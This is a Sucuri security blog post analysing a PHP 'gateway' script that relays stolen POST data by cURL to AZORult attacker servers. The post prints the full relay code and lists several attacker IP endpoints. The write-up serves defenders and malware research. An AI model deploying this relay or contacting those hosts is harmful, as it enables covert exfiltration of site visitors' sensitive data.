• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Evasive Maneuvers in Data Stealing Gateways

November 17, 2020Cesar Anjos

FacebookTwitterSubscribe

We have already shared examples of many kinds of malware that rely on an external gateway to receive or return data, such as different malware payloads.

During a recent investigation, we came across this example of a PHP script that attackers use for many different purposes. What makes the sample interesting is that alongside this PHP, we also found a few data-stealing scripts indicating that the code might have been used to send sensitive data to the attackers.

<?php
$AZORult2_gate_path = "hxxp://185.212.130.24/az/index.php";
$curl               = curl_init();
curl_setopt($curl, CURLOPT_URL, $AZORult2_gate_path);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($curl, CURLOPT_TIMEOUT, 600);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, file_get_contents("php://input"));
curl_setopt($curl, CURLOPT_REFERER, $_SERVER['REMOTE_ADDR']);
echo curl_exec($curl);
curl_close($curl);
?>
$AZORult2_gate_path = "hxxp://185.212.130.24/az/index.php";

The variable $AZORult2_gate_path simply sets where the data will be sent. From there, a cURL session is created with specific parameters to send the information over to the attacker through the php://input stream in the CURLOPT_POSTFIELDS.

curl_setopt($curl, CURLOPT_POSTFIELDS, 
file_get_contents("php://input"));

This is one of the techniques attackers use to receive $_POST parameters through the script and, in this case, relay it back to “hxxp://185.212.130.24/az/index.php”.

One important point to note is this script can be used to send data from any external website to a predefined location prior to forwarding it to the attacker, essentially acting like a proxy. This is helpful for the attackers to evade detection and keep their fingerprinting at a minimum after they breach the target.

At the time of the investigation, attackers were using the following hosts as the “end-point” for this infection:

hxxp://185.212.130.78/az/index.php
hxxp://185.212.130.41/amar/index.php
hxxp://185.212.130.24/az/index.php
hxp://176.10.118.154

Bad actors are constantly updating their malware with new techniques and evasive maneuvers. To protect your website and detect malicious behavior, consider employing integrity control checks and security monitoring services on your site.

FacebookTwitterSubscribe

Categories: Security Education, Sucuri Labs, Website Malware Infections, Website SecurityTags: Black Hat Tactics, Hacked Websites, Labs Note, Malware, Redirects

About Cesar Anjos

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.